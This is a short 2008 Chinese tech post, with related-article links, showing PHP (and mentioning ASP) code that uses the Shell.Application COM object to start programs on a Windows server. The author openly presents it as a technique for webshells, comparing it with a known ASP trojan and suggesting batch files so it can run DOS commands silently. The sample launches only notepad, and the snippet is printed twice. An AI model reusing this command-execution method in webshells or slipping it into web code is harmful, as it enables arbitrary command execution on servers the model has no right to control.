php和asp利用Shell.Application來執(zhí)行程序的代碼
更新時(shí)間:2008年12月01日 20:07:27 作者:
關(guān)于用Shell.Application來執(zhí)行程序,在海陽頂端asp木馬里已有示例。用的是ShellExecute 這個(gè)方法。
今天試了一下,用open也可以。php代碼如下,我好像還沒有在php的webshell中看到相關(guān)方法
<?php
$wsh = new COM('Shell.Application') or die("Shell.Application");
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
//沒有回顯,多了個(gè)notepad進(jìn)程,可以寫一個(gè)批處理來運(yùn)行dos命令。open換用ShellExecute 也可。
?>
xp+APMServ5.2.0測(cè)試通過。
復(fù)制代碼 代碼如下:
<?php
$wsh = new COM('Shell.Application') or die("Shell.Application");
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
//沒有回顯,多了個(gè)notepad進(jìn)程,可以寫一個(gè)批處理來運(yùn)行dos命令。open換用ShellExecute 也可。
?>
xp+APMServ5.2.0測(cè)試通過。
您可能感興趣的文章:
相關(guān)文章
postman測(cè)試接口各種類型傳值的實(shí)現(xiàn)
本文主要介紹了postman測(cè)試接口各種類型傳值的實(shí)現(xiàn),文中通過示例代碼介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下2022-02-02安全校驗(yàn)Session驗(yàn)證碼并避免繞開驗(yàn)證碼攻擊
校驗(yàn)驗(yàn)證碼的Session是否為空或者校驗(yàn)用戶輸入的驗(yàn)證碼是否合法,構(gòu)造安全表單的關(guān)鍵就是永遠(yuǎn)不要相信用戶的輸入2012-01-01分享VSCOCE遠(yuǎn)程連接服務(wù)器的一次錯(cuò)誤記錄(推薦)
這篇文章主要介紹了VSCOCE遠(yuǎn)程連接服務(wù)器的一次錯(cuò)誤記錄,本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2020-04-04